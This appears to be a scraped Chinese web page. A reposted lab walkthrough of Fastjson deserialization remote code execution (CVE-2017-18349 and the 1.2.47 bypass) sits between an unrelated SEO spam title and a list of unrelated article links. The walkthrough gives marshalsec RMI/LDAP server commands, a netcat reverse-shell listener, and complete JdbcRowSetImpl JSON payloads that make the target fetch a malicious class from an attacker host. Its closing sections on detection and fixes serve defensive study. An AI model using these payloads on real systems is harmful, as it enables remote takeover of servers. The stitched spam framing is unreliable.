当前位置: 首页 > news >正文

宁波北仑做网站做动画 的 网站有哪些

宁波北仑做网站,做动画 的 网站有哪些,wordpress免费汉化,网站生成word免责声明 本文仅限于学习讨论与技术知识的分享#xff0c;不得违反当地国家的法律法规。对于传播、利用文章中提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;本文作者不为此承担任何责任#xff0c;一旦造成后果请自行承担… 免责声明 本文仅限于学习讨论与技术知识的分享不得违反当地国家的法律法规。对于传播、利用文章中提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责本文作者不为此承担任何责任一旦造成后果请自行承担 1、Fastjson介绍 2、漏洞复现 2.1、1.2.24 RCE CVE-2017-18349 vulhub启动靶场 启动成功 Kali 用marshalsec启动LDAP/RMI服务 Kali 用python启动HTTP服务存放恶意类 这是我们的恶意代码 在jdk的bin目录下编译恶意文件 可以通过访问看有没有启动成功 Kali 用netcat监听端口建立反弹连接 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://192.168.110.5:8089/#LinuxTouch 94735、发送payload POST / HTTP/1.1 Host: 192.168.110.16:8090 Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept:text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 188{ b: { type: com.sun.rowset.JdbcRowSetImpl, dataSourceName: rmi://192.168.110.5:9473/LinuxTouch, autoCommit: true} }结果 先后连接成功 8090端口接收到了我们发送的payload并进行反序列化然后去连接到了rmi://192.168.110.5:9473这个服务器rmi服务器作为一个指路人去8089端口下载恶意文件 2.2、1.2.47 RCE CNVD-2019-22238 绕过原理 在1.2.47版本及以下的情况下loadClass中默 认cache为true首先使用java.lang.Class把获取到的类缓存到mapping中然后直接从缓存 中获取到了com.sun.rowset.jdbcRowSetlmpl这个类即可绕过黑名单。 启动靶场 kali启动监听 nc -lvp 9001Kali 用marshalsec启动LDAP/RMI服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.110.5:8089/#LinuxRevers 9473恶意类对其进行编译等等。跟上面步骤一样。 放入到对应文件夹中并启动http服务 发送payload POST / HTTP/1.1 Host: 192.168.110.16:8090 Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 268{a:{type:java.lang.Class, val:com.sun.rowset.JdbcRowSetImpl},b:{ type:com.sun.rowset.JdbcRowSetImpl, dataSourceName:ldap://192.168.110.5:9473/LinuxRevers, autoCommit:true} }连接成功 3、漏洞原理 1、序列化字符准备类名、dataSourceName属性和autoCommit属性 2、JdbcRowSetImpl反序列化调用JdbcRowSetImpl的setAutoCommit() 3、setAutoCommit()调用connect() 3、connect()调用lookup()连接到LDAP/RMI服务器 4、下载恶意代码到本地执行攻击发生 4、漏洞挖掘思路 找到发送JSON序列化数据的接口判断是否使用fastjon 非法格式报错 {“x”: Burp 插件 https://github.com/zilong3033/fastjsonScan 5、漏洞修复 升级JDK 6u211 / 7u201 / 8u191 /11.0.1升级Fastjson到最新版 fastjson.parser.safeModetrue使用安全产品过滤非法内容更换其它序列化工具 Jackson/Gson
http://www.hkea.cn/news/14541177/

相关文章:

  • 常州公司网站模板建站福建设备公司网站
  • seo公司哪家好用白云怎样优化网站建设
  • 学校网站模板 dedecms青岛建设银行银行招聘网站
  • 福建网站建设公wordpress移动
  • 网站创建怎么做游戏源码搭建
  • 免费毕业设计网站建设wordpress按钮灯箱
  • 无锡市锡山区建设局网站做安利能开个人网站
  • 专门做外国的网站有哪些以域名做网站关键词
  • 黑龙江建设厅网站官网seo算法是什么
  • 网络营销与传统营销的关系外贸网站推广优化
  • 一个销售网站的设计 应当是要汕头百度公司
  • 网站建站设计建设网站费用明细
  • 网站开发包含哪些类别中国住房和城乡建设部网站证书查询
  • 有关做服装的网站吗网店怎么开步骤
  • 通辽正规网站建设mysql 连接wordpress
  • 云南建设投资控股集团有限公司网站门户网站的建设和管理情况自查
  • 来自网站的临时会话公司网站怎么建立优化体系
  • 戚墅堰常州做网站做装饰公司网站6
  • 网站建设加班炫酷网站模板免费下载
  • 网站制作钱站长一般几个网站
  • 档案网站建设优秀代表seo搜索优化专员招聘
  • 成都网站开发企业网络推广就找南昌莫非传媒
  • 西安网站建设网络公司网站上的定位功能如何实现的
  • 网站建设电商学堂深圳制作网站培训学校
  • 孝感高新区建设局网站大连企业网站哪一家好
  • 手机网站存储登录信息网站建设广州天河区
  • 德州王霞网站建设泽成杭州seo网站推广排名
  • 做网站的例子网站开发项目扶持政策有哪些
  • 施工企业排名深圳网站优化服务
  • 自适应网站开发云优化 网站建设